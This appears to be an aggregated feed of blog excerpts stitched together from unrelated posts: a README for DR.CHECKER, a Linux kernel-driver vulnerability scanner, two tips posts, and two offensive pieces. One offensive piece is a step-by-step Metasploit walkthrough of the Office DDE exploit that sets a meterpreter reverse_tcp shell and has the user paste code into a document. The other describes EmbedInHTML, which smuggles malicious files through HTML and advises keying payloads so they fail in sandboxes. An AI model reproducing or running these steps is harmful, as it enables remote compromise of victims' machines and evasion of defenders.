DR.CHECKER – A Soundy Vulnerability Detection Tool for Linux Kernel Drivers

DR.CHECKER: A Soundy Vulnerability Detection Tool for Linux Kernel DriversTested onUbuntu >= 14.04.5 LTS1. SetupThe implementation is based on LLVM, specifically LLVM 3.8. We also need tools like c2xml to parse headers.First, make sure that you have libxml (required for c2xml):sudo apt-get install libxml2-devNext, We have created a single script, which downloads and builds all the required tools.cd helper_scriptspython setup_drchecker.py –helpusage: setup_drchecker.py [-h] [-b TARGET_BRANCH] [-o OUTPUT_FOLDER]optional arguments: -h, –help show this help message and exit -b TARGET_BRANCH Branch (i.e. version) of the LLVM to setup. Default: release_38 e.g., release_38 -o OUTPUT_FOLDER Folder where everything needs to be setup.Example:python setup_drchecker.py -o drchecker_depsTo complete the setup you also need modifications to your local PATH environment variable. The setup script will give you exact changes you need to do.2. BuildingThis depends on the successful completion of Setup. We have a single script that builds everything, you are welcome.cd llvm_analysis./build.sh3. RunningThis depends on the successful completion of Build. To run DR.CHECKER on kernel drivers, we need to first convert them into llvm bitcode.3.1 Building kernelFirst, we need to have a buildable kernel. Which means you should be able to compile the kernel using regular build setup. i.e., make. We first capture the output of make command, from this output we extract the exact compilation command.3.1.1 Generating output of make (or makeout.txt)Just pass V=1 and redirect the output to the file. Example:make V=1 O=out ARCH=arm64 > makeout.txt 2>&1NOTE: DO NOT USE MULTIPLE PROCESSES i.e., -j. Running in multi-processing mode will mess up the output file as multiple process try to write to the output file.That’s it. DR.CHECKER will take care from here.3.2 Running DR.CHECKER analysisThere are several steps to run DR.CHECKER analysis, all these steps are wrapped in a single script helper_scripts/runner_scripts/run_all.py How to run:python run_all.py –helpusage: run_all.py [-h] [-l LLVM_BC_OUT] [-a CHIPSET_NUM] [-m MAKEOUT] [-g COMPILER_NAME] [-n ARCH_NUM] [-o OUT] [-k KERNEL_SRC_DIR] [-skb] [-skl] [-skp] [-ske] [-ski] [-f SOUNDY_ANALYSIS_OUT]optional arguments: -h, –help show this help message and exit -l LLVM_BC_OUT Destination directory where all the generated bitcode files should be stored. -a CHIPSET_NUM Chipset number. Valid chipset numbers are: 1(mediatek)|2(qualcomm)|3(huawei)|4(samsung) -m MAKEOUT Path to the makeout.txt file. -g COMPILER_NAME Name of the compiler used in the makeout.txt, This is needed to filter out compilation commands. Ex: aarch64-linux-android-gcc -n ARCH_NUM Destination architecture, 32 bit (1) or 64 bit (2). -o OUT Path to the out folder. This is the folder, which could be used as output directory during compiling some kernels. (Note: Not all kernels needs a separate out folder) -k KERNEL_SRC_DIR Base directory of the kernel sources. -skb Skip LLVM Build (default: not skipped). -skl Skip Dr Linker (default: not skipped). -skp Skip Parsing Headers (default: not skipped). -ske Skip Entry point identification (default: not skipped). -ski Skip Soundy Analysis (default: not skipped). -f SOUNDY_ANALYSIS_OUT Path to the output folder where the soundy analysis output should be stored.The script builds, links and runs DR.CHECKER on all the drivers, as such might take considerable time(45 min-90 min). If you want to run DR.CHECKER manually on individual drivers, refer standaloneThe above script performs following tasks in a multiprocessor mode to make use of all CPU cores:3.2.1. LLVM BuildEnabled by default.All the bitcode files generated will be placed in the folder provided to the argument -l. This step takes considerable time, depending on the number of cores you have. So, if you had already done this step, You can skip this step by passing -skb.3.2.2. Linking all driver bitcode files in s consolidated bitcode file.Enabled by defaultThis performs linking, it goes through all the bitcode files and identifies the related bitcode files that need to be linked and links them (using llvm-link) in to a consolidated bitcode file (which will be stored along side corresponding bitcode file).Similar to the above step, you can skip this step by passing -skl.3.2.3.Parsing headers to identify entry function fields.Enabled by default.This step looks for the entry point declarations in the header files and stores their configuration in the file: hdr_file_config.txt under LLVM build directory.To skip: -skp3.2.4.Identify entry points in all the consolidated bitcode files.Enabled by defaultThis step identifies all the entry points across all the driver consolidated bitcode files. The output will be stored in file: entry_point_out.txt under LLVM build directory.Example of contents in the file entry_point_out.txt:FileRead:hidraw_read:/home/drchecker/33.2.A.3.123/llvm_bc_out/drivers/hid/llvm_link_final/final_to_check.bcFileWrite:hidraw_write:/home/drchecker/33.2.A.3.123/llvm_bc_out/drivers/hid/llvm_link_final/final_to_check.bcIOCTL:hidraw_ioctl:/home/drchecker/33.2.A.3.123/llvm_bc_out/drivers/hid/llvm_link_final/final_to_check.bcTo skip: -ske3.2.5.Run Soundy Analysis on all the identified entry points.Enabled by default.This step will run DR.CHECKER on all the entry points in the file entry_point_out.txt. The output for each entry point will be stored in the folder provided for option -f.To skip: -ski3.2.6 Example:Now, we will show an example from the point where you have kernel sources to the point of getting vulnerability warnings.We have uploaded a mediatek kernel 33.2.A.3.123.tar.bz2. First download and extract the above file.Lets say you extracted the above file in a folder called: ~/mediatek_kernel3.2.6.1 Buildingcd ~/mediatek_kernelsource ./env.shcd kernel-3.18# the following step may not be needed depending on the kernelmkdir outmake O=out ARCH=arm64 tubads_defconfig# this following command copies all the compilation commands to makeout.txtmake V=1 -j8 O=out ARCH=arm64 > makeout.txt 2>&13.2.6.2 Running DR.CHECKERcd /helper_scripts/runner_scriptspython run_all.py -l ~/mediatek_kernel/llvm_bitcode_out -a 1 -m ~/mediatek_kernel/kernel-3.18/makeout.txt -g aarch64-linux-android-gcc -n 2 -o ~/mediatek_kernel/kernel-3.18/out -k ~/mediatek_kernel/kernel-3.18 -f ~/mediatek_kernel/dr_checker_outThe above command takes quite some time (30 min – 1hr).3.2.6.3 Understanding the outputFirst, all the analysis results will be in the folder: ~/mediatek_kernel/dr_checker_out (argument given to the option -f), for each entry point a .json file will be created which contains all the warnings in JSON format. These json files contain warnings organized by contexts.Second, The folder ~/mediatek_kernel/dr_checker_out/instr_warnings (w.r.t argument given to the option -f) contains warnings organized by instruction location.These warnings could be analyzed using our Visualizer.Finally, a summary of all the warnings for each entry point organized by the type will be written to the output CSV file: ~/mediatek_kernel/dr_checker_out/warnings_stats.csv (w.r.t argument given to the option -f).3.2.7 Things to note:3.2.7.1 Value for option -gTo provide value for option -g you need to know the name of the *-gcc binary used to compile the kernel. An easy way to know this would be to grep for gcc in makeout.txt and you will see compiler commands from which you can know the *-gcc binary name.For our example above, if you do grep gcc makeout.txt for the example build, you will see lot of lines like below:aarch64-linux-android-gcc -Wp,-MD,fs/jbd2/.transaction.o.d -nostdinc -isystem …So, the value for -g should be aarch64-linux-android-gcc.If the kernel to be built is 32-bit then the binary most likely will be arm-eabi-gcc3.2.7.2 Value for option -aDepeding on the chipset type, you need to provide corresponding number.3.2.7.3 Value for option -oThis is the path of the folder provided to the option O= for make command during kernel build.Not all kernels need a separate out path. You may build kernel by not providing an option O, in which case you SHOULD NOT provide value for that option while running run_all.py.3.3 Visualizing DR.CHECKER results We provide a web-based UI to view all the warnings. Please refer Visualization.3.6 Disabling Vulnerability checkersYou can disable one or more vulnerability checkers by uncommenting the corresponding #define DISABLE_* lines in BugDetectorDriver.cpp3.5 Post-processing DR.CHECKER resultsTo your liking, we also provide a script to post-process the results. Check it out.Have fun!!Download DR.CHECKER

Link: http://feedproxy.google.com/~r/PentestTools/~3/0Ij2GhMAwEc/drchecker-soundy-vulnerability.html

Exploit Microsoft Office DDE Command Execution Vulnerability

Download module wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb Move module into framework mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/ Open Metasploit and load exploit msfconsole reload_all use exploit/windows/dde_delivery Set the sever host set SRVHOST 192.168.1.10 Choose payload and run it set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.10 set LPORT 443 exploit Copy paste the code into any word/excel document. Open Word/Excel. Create a new …

Link: http://securityblog.gr/4478/exploit-microsoft-office-dde-command-execution-vulnerability/

How to Stop Autoplay Videos in Chrome

Autoplay videos are now on most of the big websites. Facebook even use it on its mobile app. Recently a report claimed that Google was testing autoplay ads on search results. Auto-playing videos on the web are one of the most annoying things. Think if you are silently browsing the web at a public place […]
The post How to Stop Autoplay Videos in Chrome appeared first on UseThisTip.

Link: http://feedproxy.google.com/~r/blogspot/csAFg/~3/cuS6Cjy436s/stop-autoplay-video-chrome.html

Content Delivery Network – Taking your business ahead

To accelerate content delivery, we must ensure that the data source is near to the end users. Minimizing distance helps to improve the speed of websites giving better user experience and more business opportunities.  CDN or Content Delivery Network is designed to alleviate latency by making content quickly available to the end users. For instance, you have content in servers lying in the UK and targeting Asia users. There will definitely be a certain amount of latency on the way due to the distance. But if those contents are available in servers placed in Asia, the delivery would be relatively
The post Content Delivery Network – Taking your business ahead appeared first on CrazyLearner.

Link: http://crazylearner.org/content-delivery-network-taking-business-ahead/

EmbedInHTML – Embed and hide any file in an HTML file

What this tool does is taking a file (any type of file), encrypt it, and embed it into an HTML file as ressource, along with an automatic download routine simulating a user clicking on the embedded ressource.Then, when the user browses the HTML file, the embedded file is decrypted on the fly, saved in a temporary folder, and the file is then presented to the user as if it was being downloaded from the remote site. Depending on the user’s browser and the file type presented, the file can be automatically opened by the browser.This tool comes in two flavors, providing the same overall functionnality but with some slight changes in the way of using it: An python script which generates the output HTML file based on a template, using RC4 encryption routines, and embedding the decryption key within the output file. The resulting HTML can either be browsed by the targeted user or sent as an attachement. An HTML/Javascript that you can drag the file into be encrypted to, which generates the output HTML file, using the WebCrypto API, but NOT embedding the decryption material (key and counter). Instead, the decryption material is displayed as a set of URL parameters to be added into a URL pointing to the HTML resulting file: http(s)://hosting.server.com/result.html#hexencodedkey!hexencodedcounter. So the resulting HTML file cannot be sent as an attachment. The main advantage of this technique is that the decryption material is not embedded into the file itself, hence preventing analysis and even retrieval of the payload by any system which doesn’t have the full URL (eg: intercepting proxy) Side notes: This tool was inspired and derived from the great ‘demiguise’ tool : https://github.com/nccgroup/demiguise The b64AndRC4 function used on the binary input (from the XLL file) is a mix of: https://gist.github.com/borismus/1032746 and https://gist.github.com/farhadi/2185197 Check https://gist.github.com/Arno0x/f71a9db515ddea686ccdd77666bebbaa for an easy malicious XLL creation which is a perfect example of a malicious document one could try to deliver with this method. In the HTML template (html.tpl file) it is advised to insert your own key environmental derivation function below in place of the ‘keyFunction’. You should derive your key from the environment so that it only works on your intended target (and not in a sandbox). UsageFew payload examples files are provided in the payloads_examplesdirectory. For instance thecalc.xllis an Excel add-in (XLL) file that contains a metasploit shellcode for x86 processes to launch the calc.exeprocess.Using the python script1/ Generate the malicious html file from the XLL file, along with a secret key: python embedInHTML.py -k mysecretkey -f example_calc.xll -o index.html2/ Expose the html file on a web server (one can be optionnaly started for you with the-w flag)Using the HTML/Javascript1/ Open the embedInHTML.html file within a browser2/ Simply drag the payload file into the page (you can optionnaly change the output file name)3/ Save the resulting file and take note of the decryption material as URL parameters to be added to the file name in the form: http(s)://hosting.server.com/result.html#hexencodedkey!hexencodedcounterEventually…Point the target’s browser to the html file and let the magic happen:Download EmbedInHTML

Link: http://feedproxy.google.com/~r/PentestTools/~3/_GxGs0UmT6k/embedinhtml-embed-and-hide-any-file-in.html